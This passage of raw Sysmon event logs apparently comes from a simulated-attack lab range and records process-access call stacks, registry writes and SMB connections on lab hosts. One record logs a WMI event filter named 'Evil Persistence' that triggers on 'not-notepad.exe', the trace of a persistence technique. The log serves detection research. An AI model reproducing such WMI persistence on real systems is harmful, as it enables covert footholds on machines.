Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=986805BAFCA09C6D4B0806AE98E8C673,SHA256=E98C99AAF4D538C89180C6691946B73208F2E29A04342B463B0E694D732208F5,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000151639Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.localInvDB-VerSetValue2021-06-16 21:46:49.754{39BD8DE3-7149-60CA-240D-00000000D101}1424C:\Windows\system32\WerFault.exe\REGISTRY\A\{e83de03b-dba1-e057-1017-37e59540be30}\Root\InventoryApplicationFile\sysmon64.exe|878d5ea8246959be\BinProductVersion13.0.1.0 13241300x8000000000000000151638Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.localInvDB-CompileTimeClaimSetValue2021-06-16 21:46:49.754{39BD8DE3-7149-60CA-240D-00000000D101}1424C:\Windows\system32\WerFault.exe\REGISTRY\A\{e83de03b-dba1-e057-1017-37e59540be30}\Root\InventoryApplicationFile\sysmon64.exe|878d5ea8246959be\LinkDate01/12/2021 18:02:04 13241300x8000000000000000151637Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.localInvDB-PubSetValue2021-06-16 21:46:49.754{39BD8DE3-7149-60CA-240D-00000000D101}1424C:\Windows\system32\WerFault.exe\REGISTRY\A\{e83de03b-dba1-e057-1017-37e59540be30}\Root\InventoryApplicationFile\sysmon64.exe|878d5ea8246959be\Publishersysinternals - www.sysinternals.com 13241300x8000000000000000151636Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.localInvDB-PathSetValue2021-06-16 21:46:49.754{39BD8DE3-7149-60CA-240D-00000000D101}1424C:\Windows\system32\WerFault.exe\REGISTRY\A\{e83de03b-dba1-e057-1017-37e59540be30}\Root\InventoryApplicationFile\sysmon64.exe|878d5ea8246959be\LowerCaseLongPathc:\windows\sysmon64.exe 10341000x8000000000000000151635Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.669{39BD8DE3-7149-60CA-240D-00000000D101}14244012C:\Windows\system32\WerFault.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\system32\faultrep.dll+f0f8|C:\Windows\system32\faultrep.dll+8762|C:\Windows\system32\faultrep.dll+720c|C:\Windows\system32\WerFault.exe+15abe|C:\Windows\system32\WerFault.exe+13e8|C:\Windows\system32\WerFault.exe+241ad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151634Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.669{39BD8DE3-7149-60CA-240D-00000000D101}14244012C:\Windows\system32\WerFault.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\faultrep.dll+80af|C:\Windows\system32\faultrep.dll+720c|C:\Windows\system32\WerFault.exe+15abe|C:\Windows\system32\WerFault.exe+13e8|C:\Windows\system32\WerFault.exe+241ad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151633Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.669{39BD8DE3-7149-60CA-240D-00000000D101}14244012C:\Windows\system32\WerFault.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\WerFault.exe+15a6e|C:\Windows\system32\WerFault.exe+13e8|C:\Windows\system32\WerFault.exe+241ad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151632Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.669{39BD8DE3-7149-60CA-240D-00000000D101}14244012C:\Windows\system32\WerFault.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\WerFault.exe+1599f|C:\Windows\system32\WerFault.exe+13e8|C:\Windows\system32\WerFault.exe+241ad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151631Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.591{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151630Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.591{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151629Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.591{39BD8DE3-0F63-60CA-0500-00000000D101}408524C:\Windows\system32\csrss.exe{39BD8DE3-7149-60CA-240D-00000000D101}1424C:\Windows\system32\WerFault.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151628Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.591{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151627Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.591{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151626Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.591{39BD8DE3-7149-60CA-230D-00000000D101}70445468C:\Windows\System32\svchost.exe{39BD8DE3-7149-60CA-240D-00000000D101}1424C:\Windows\system32\WerFault.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|c:\windows\system32\faultrep.dll+6abb|c:\windows\system32\faultrep.dll+7121|c:\windows\system32\wersvc.dll+b0bc|c:\windows\system32\wersvc.dll+8833|c:\windows\system32\wersvc.dll+5a0f|c:\windows\system32\wersvc.dll+5678|C:\Windows\SYSTEM32\ntdll.dll+80a24|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000151625Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.583{39BD8DE3-7149-60CA-240D-00000000D101}1424C:\Windows\System32\WerFault.exe10.0.14393.4402 (rs1_release.210426-1725)Windows Problem ReportingMicrosoft® Windows® Operating SystemMicrosoft CorporationWerFault.exeC:\Windows\system32\WerFault.exe -u -p 1972 -s 7340C:\Windows\system32\NT AUTHORITY\SYSTEM{39BD8DE3-0F64-60CA-E703-000000000000}0x3e70SystemMD5=1C7DB4A4F28D9003E4AC027D9F486B7E,SHA256=F4EF776BE91D69CA06E0C67848634C9C764DBA7B47365B643CFFC181B24EA51D,IMPHASH=4D7307CFBDBD0C5F1319B1CF5C054CA6{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exeC:\Windows\sysmon64.exe 10341000x8000000000000000151624Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.569{39BD8DE3-0F64-60CA-0B00-00000000D101}6241252C:\Windows\system32\lsass.exe{39BD8DE3-7149-60CA-230D-00000000D101}7044C:\Windows\System32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151623Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.569{39BD8DE3-0F64-60CA-0B00-00000000D101}6241252C:\Windows\system32\lsass.exe{39BD8DE3-7149-60CA-230D-00000000D101}7044C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151622Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.569{39BD8DE3-7149-60CA-230D-00000000D101}70445468C:\Windows\System32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\wersvc.dll+b039|c:\windows\system32\wersvc.dll+8833|c:\windows\system32\wersvc.dll+5a0f|c:\windows\system32\wersvc.dll+5678|C:\Windows\SYSTEM32\ntdll.dll+80a24|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151621Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.569{39BD8DE3-7149-60CA-230D-00000000D101}70445468C:\Windows\System32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\wersvc.dll+ae29|c:\windows\system32\wersvc.dll+8833|c:\windows\system32\wersvc.dll+5a0f|c:\windows\system32\wersvc.dll+5678|C:\Windows\SYSTEM32\ntdll.dll+80a24|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151620Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.569{39BD8DE3-7149-60CA-230D-00000000D101}70445468C:\Windows\System32\svchost.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x50C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\wersvc.dll+8a50|c:\windows\system32\wersvc.dll+86ec|c:\windows\system32\wersvc.dll+5a0f|c:\windows\system32\wersvc.dll+5678|C:\Windows\SYSTEM32\ntdll.dll+80a24|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151619Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.470{39BD8DE3-0F64-60CA-0A00-00000000D101}6164884C:\Windows\system32\services.exe{39BD8DE3-7149-60CA-230D-00000000D101}7044C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151618Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.470{39BD8DE3-0F63-60CA-0500-00000000D101}408976C:\Windows\system32\csrss.exe{39BD8DE3-7149-60CA-230D-00000000D101}7044C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000151617Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.470{39BD8DE3-0F64-60CA-0A00-00000000D101}6161856C:\Windows\system32\services.exe{39BD8DE3-7149-60CA-230D-00000000D101}7044C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+17f9d|C:\Windows\SYSTEM32\ntdll.dll+65b55|C:\Windows\SYSTEM32\ntdll.dll+6585d|C:\Windows\SYSTEM32\ntdll.dll+656c0|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151616Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.454{39BD8DE3-0F64-60CA-0B00-00000000D101}6241252C:\Windows\system32\lsass.exe{39BD8DE3-0F64-60CA-0A00-00000000D101}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151615Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.454{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151614Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.454{39BD8DE3-0F64-60CA-0C00-00000000D101}7207160C:\Windows\system32\svchost.exe{39BD8DE3-0F64-60CA-0B00-00000000D101}624C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151613Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.454{39BD8DE3-0F64-60CA-0B00-00000000D101}6241252C:\Windows\system32\lsass.exe{39BD8DE3-0F64-60CA-0A00-00000000D101}616C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151612Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.454{39BD8DE3-0F65-60CA-1B00-00000000D101}19723648C:\Windows\sysmon64.exe{39BD8DE3-7149-60CA-220D-00000000D101}5840C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6614|C:\Windows\SYSTEM32\ntdll.dll+58dbb|C:\Windows\SYSTEM32\ntdll.dll+696b|C:\Windows\SYSTEM32\ntdll.dll+75bf|C:\Windows\SYSTEM32\ntdll.dll+6787|C:\Windows\System32\combase.dll+16edc5|C:\Windows\System32\combase.dll+16f080|C:\Windows\System32\combase.dll+16eae6|C:\Windows\System32\combase.dll+1120f7|C:\Windows\System32\ucrtbase.dll+3acd0|C:\Windows\SYSTEM32\ntdll.dll+aa70d|C:\Windows\SYSTEM32\ntdll.dll+349c3|C:\Windows\SYSTEM32\ntdll.dll+a987a|C:\Windows\sysmon64.exe+8ae0e|C:\Windows\sysmon64.exe+7b7c|C:\Windows\sysmon64.exe+3b247|C:\Windows\system32\wbem\fastprox.dll+2ca58|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274 23542300x8000000000000000151611Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.369{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BD58FA3C930FF43910F2E3C7215F5E8,SHA256=346F623CEC96F9A5B5BB2F9AE30263F26CF8CC9E65D00A3691166DD37C30107F,IMPHASH=00000000000000000000000000000000falsetrue 19341900x8000000000000000151610Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-WmiFilterEvent2021-06-16 21:46:49.322ModifiedWIN-HOST-14\Administrator "root/cimv2" "Evil Persistence" "select * from Win32_ProcessStartTrace where ProcessName='not-notepad.exe'" 10341000x8000000000000000151609Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.307{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151608Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:46:49.254{39BD8DE3-131D-60CA-0B01-00000000D101}11926820C:\Program Files\Mozilla Firefox\firefox.exe{39BD8DE3-131F-60CA-0D01-00000000D101}2148C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+2cf80|C:\Program Files\Mozilla Firefox\firefox.exe+2cad3|C:\Program Files\Mozilla Firefox\firefox.exe+40de0|C:\Program Files\Mozilla Firefox\firefox.exe+40adc|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000105021Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:49.076{54715871-FD14-60C9-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55427-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local445microsoft-ds 354300x8000000000000000105020Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:46:49.076{54715871-FD14-60C9-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local55427-truefe80:0:0:0:5903:b2a9:cf82:36c4win-dc-681.attackrange.local445microsoft-ds 23542300x8000000000000000105019Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 